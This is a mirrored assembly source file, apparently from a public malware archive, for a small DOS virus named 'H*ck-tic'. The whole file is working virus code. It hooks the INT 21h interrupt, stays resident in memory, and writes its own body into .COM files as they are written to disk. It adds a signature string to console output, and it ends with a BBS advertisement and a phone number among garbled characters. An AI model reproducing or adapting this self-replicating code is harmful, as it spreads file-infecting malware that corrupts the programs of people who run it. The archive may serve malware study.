mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
84 lines
3.1 KiB
NASM
84 lines
3.1 KiB
NASM
tic segment
|
||
org 100h
|
||
assume cs:tic, ds:tic, es:tic
|
||
;
|
||
len equ offset int21-100h ;LENGTH OF VIRUS CODE
|
||
;
|
||
start: mov ax,9000h ;MOVE VIRUS CODE UP
|
||
mov es,ax
|
||
mov di,si
|
||
mov cx,len
|
||
rep movsb
|
||
mov ds,cx ;DS = 0
|
||
mov si,84h ;INT 21 VECTOR
|
||
mov di,offset int21
|
||
push di
|
||
mov dx,offset infect
|
||
lodsw ;SAVE ORIGINAL VECTOR
|
||
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
|
||
je exit
|
||
stosw
|
||
lodsw
|
||
stosw
|
||
push es
|
||
pop ds
|
||
mov ax,2521h ;REVECTOR TO VIRUS
|
||
int 21h
|
||
exit: push cs ;RESTORE SEGMENT REGISTERS
|
||
pop ds
|
||
push cs
|
||
pop es
|
||
pop si ;SI = END OF VIRUS CODE
|
||
mov di,0fch
|
||
push di ;RETURN HERE
|
||
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
|
||
stosw
|
||
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
|
||
stosw
|
||
mov ch,0feh
|
||
ret ;MOVE CODE AND RUN PROGRAM
|
||
;
|
||
infect: pushf
|
||
push ax
|
||
push cx
|
||
push dx
|
||
push si
|
||
push ds
|
||
cmp ah,40h ;WRITE FUNC?
|
||
jne done
|
||
cmp bx,1
|
||
je mes
|
||
mov si,dx ;DS:DX = WRITE BUFFER
|
||
lodsb
|
||
cmp al,0b8h ;ALREADY INFECTED?
|
||
je done
|
||
cmp al,0ebh ;PROBABLY .COM
|
||
jne done
|
||
mov cx,len ;LENGTH OF VIRUS
|
||
mov dh,1 ;DX ASSUMED TO BE 0
|
||
hack: push cs
|
||
pop ds
|
||
pushf
|
||
call cs:[int21] ;WRITE VIRUS
|
||
done: pop ds
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop ax
|
||
popf ;CONTINUE INTERRUPT
|
||
jmp cs:[int21]
|
||
mes: mov cx,12
|
||
mov dx,offset string
|
||
jmp short hack
|
||
string db ' (H*ck-tic) '
|
||
;
|
||
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
|
||
tic ends
|
||
end start
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|